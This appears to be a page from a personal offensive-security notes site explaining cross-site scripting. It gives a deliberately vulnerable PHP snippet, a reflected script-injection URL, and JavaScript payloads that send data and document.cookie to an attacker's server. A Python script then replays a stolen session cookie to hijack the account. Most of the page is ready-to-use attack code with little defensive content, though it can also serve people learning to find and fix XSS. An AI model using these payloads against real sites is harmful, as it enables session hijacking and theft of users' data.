XSS
Cross-Site Scripting (XSS)

Reflected

Vulnerable code

1
<?php
2
echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
3
?>
Copied!

The injection

http(s)://HOST/file.php?search=1

Response

1
<div><p>Searched string: 1</p></div>
Copied!
http(s)://HOST/file.php?search=</p><script>alert()</script><p>

Response

1
<div><p>Searched string: </p><script>alert()</script><p></p></div>
Copied!
As you can see, the injected code gets inserted into the HTML response of the website.
</p> -> Closing current tag. <script> -> Opening javascript tag. alert() -> Function to pop an alert box. </script> -> Closing javascript tag. <p> -> Reopening p tag for the response not to mess up.

Stored

In this injection, the code gets stored into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.

Data exfiltration

To exfiltrate data, a receiving server would be needed, like a HTPP server.
NGROK's substitute for tunXs and python's SimpleHTTPSever/http.server

Exfiltrating basic data

1
<html>
2
<script>
3
4
first = new XMLHttpRequest();
5
first.open("POST", "YOUR-SERVER");
6
first.send("EXFILTRATED-DATA");
7
8
</script>
9
</html>
Copied!

Exfiltrating other endpoint's data

1
<html>
2
<script>
3
4
first = new XMLHttpRequest();
5
first.open("GET", "TARGET-SERVER");
6
first.onreadystatechange = function () {
7
if (first.readyState === XMLHttpRequest.DONE) {
8
second = new XMLHttpRequest();
9
second.open("POST", "YOUR-SERVER");
10
second.send("EXFILTRATED-DATA");
11
}
12
}
13
first.send();
14
15
</script>
16
</html>
17
Copied!

Session Hijaking

In a nuthshell, stealing the (administrator|authenticated user) sesion cookie's value and using it.
1
<html>
2
<script>
3
4
first = new XMLHttpRequest();
5
first.open("POST", "YOUR-SERVER");
6
first.send(document.cookie);
7
8
</script>
9
</html>
Copied!
1
import requests
2
3
url = ""
4
exfiltrated_cookie = ""
5
cookies = {'PHPSESSID': f"{exfiltrated_cookie}"} # Example
6
7
r = requests.get(url, cookies=cookies)
Copied!

Filter Bypass

https://owasp.org/www-community/xss-filter-evasion-cheatsheet
owasp.org
247ctf [Web]: TrustedClient
ITasahobby
Last modified 1yr ago